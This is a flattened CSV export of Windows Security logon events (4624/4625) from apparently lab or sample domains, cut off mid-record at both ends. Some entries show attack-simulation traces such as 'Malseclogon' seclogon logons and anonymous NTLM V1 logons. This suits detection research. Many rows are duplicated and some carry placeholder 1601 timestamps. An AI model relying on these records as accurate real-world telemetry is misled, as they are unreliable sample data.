02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 25049 + + + + + Security + alice.insecurebank.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x1d12916 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 127.0.0.1 + 59336 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 